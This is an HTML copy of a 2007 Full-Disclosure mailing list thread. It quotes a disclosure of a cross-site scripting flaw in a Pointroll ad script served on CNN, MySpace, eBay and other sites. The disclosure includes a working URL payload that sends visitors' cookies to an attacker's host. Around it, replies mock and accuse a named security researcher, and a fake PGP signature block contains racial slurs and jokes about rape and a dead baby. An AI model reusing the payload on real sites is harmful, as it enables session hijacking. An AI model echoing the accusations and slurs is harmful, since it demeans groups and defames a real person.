i hurd pdp likes animal porn, is this true? pdp can you give us a detailed write up of where you find your animal porn? along with xss 0dayz in every link?<br><br><div><span class="gmail_quote">On 10/19/07, <b class="gmail_sendername">
phioust</b> <<a href="mailto:phioust@gmail.com">phioust@gmail.com</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">in order for this severe vulnerability to get the attention it deserves it should of first been given to pdp architect so that he could whore it up to the media and do many interviews and pdfs on it.
<br><br><a href="http://www.theinquirer.net/gb/inquirer/news/2007/10/10/bt-home-hub-wide-open" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.theinquirer.net/gb/inquirer/news/2007/10/10/bt-home-hub-wide-open</a><br><a href="http://www.gnucitizen.org/about/pdp#comment-59109" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.gnucitizen.org/about/pdp#comment-59109
</a><br><a href="http://securityreason.com/securityalert/3213" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://securityreason.com/securityalert/3213</a><br><a href="http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=22351&mode=thread&order=0&thold=0" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=22351&mode=thread&order=0&thold=0
</a><br><br>pdp architect could of also given great technical insight into the vulnerability due to his years spend researching XSS.<br><br><a href="http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0091.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0091.html</a> <- a very technical email by pdp<br><br><font size="-1">Results <b>1</b> - <b>10</b> of about <b>59,000</b> for <b>pdp <span style="text-decoration: underline;">
architect</span> xss</b>. (<b>0.12</b> seconds) <br><br>^ a great way to make a security career if stack based overflows are too challenging for you<br><br></font><div><div><span class="e" id="q_115b96db7128bd62_1"><span class="gmail_quote">
On 10/18/07, <b class="gmail_sendername">
jgffgjfgd rewrewrew</b> <<a href="mailto:ctjsme@gmail.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">ctjsme@gmail.com</a>> wrote:</span></span></div><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div><span class="e" id="q_115b96db7128bd62_3">
A cross-site scripting vulnerability has been discovered on multiple websites which use ads provided by Pointroll.<br>
<br>
The following list is a subset of the websites which contain the vulnerability:<br>
<a title="http://www.cnn.com/pointroll/PointRollAds.htm" href="http://www.cnn.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.cnn.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.myspace.com/pointroll/PointRollAds.htm" href="http://www.myspace.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.myspace.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.friendster.com/pointroll/PointRollAds.htm" href="http://www.friendster.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.friendster.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://archive.gamespy.com/pointroll/PointRollAds.htm" href="http://archive.gamespy.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://archive.gamespy.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.monster.com/pointroll/PointRollAds.htm" href="http://www.monster.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.monster.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.allmusic.com/pointroll/PointRollAds.htm" href="http://www.allmusic.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.allmusic.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.pcworld.com/pointroll/PointRollAds.htm" href="http://www.pcworld.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.pcworld.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.10best.com/pointroll/PointRollAds.htm" href="http://www.10best.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.10best.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://www.askmen.com/pointroll/PointRollAds.htm" href="http://www.askmen.com/pointroll/PointRollAds.htm" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.askmen.com/pointroll/PointRollAds.htm
</a><br>
<a title="http://pages.ebay.com/pointroll/PointRollAds.html" href="http://pages.ebay.com/pointroll/PointRollAds.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://pages.ebay.com/pointroll/PointRollAds.html
</a><br>
<br>
The above pages include a script at <a href="http://pointroll.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">pointroll.com</a> which is the root of
the vulnerability. The vulnerability arises from the use of
location.search without sanitizing the query.<br>
<br>
The following is a proof of concept which works in Firefox. This should
be placed onto the end of any of the above URLs, obviously. [URL]
should be replaced by your website URL, such as <a title="http://www.foo.com/bar.php," href="http://www.foo.com/bar.php," target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.foo.com/bar.php,
</a> and [LENGTH+1] should be the length of your website URL + 1.
<br>
<br>
?pub=[URL]?&redir=%27%3E%3Cscript%3Ewindow.location=location.search.substring(5,[LENGTH+1]).concat(document.cookie)%3C/script%3E&ad=g235e20051011164320
<br></span></div><span class="q">_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://secunia.com/</a><br>
</span></blockquote></div><br>
<br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://secunia.com/" target="_blank">http://secunia.com/</a><br>
</blockquote></div><br><br clear="all"><br>-- <br>-----BEGIN PGP SIGNATURE-----<br>Note: This signature can be verified at <a href="https://www.hushtools.com/verify">https://www.hushtools.com/verify</a><br>Charset: UTF8<br>
Version: Hush 2.5<br><br>HACKERShack0d4yc4nh4pp3nTOanyONEfull-disclosureh4ckkfisaniggerEPICLULZ<br>DVDMANlyk3zD1ck101010ri0nSNORTsCOKEmethSHOOTheroinNIGGERbabydrownedlol<br>r00t@hardened-phpLOLOL:DLOLHATshifteeisafed+ROOFEYZ/GHBdaterapelulzzzz
<br>SEKURITYIZSERIOUSBUSINESS<br>=EPICLULZ<br>-----END PGP SIGNATURE-----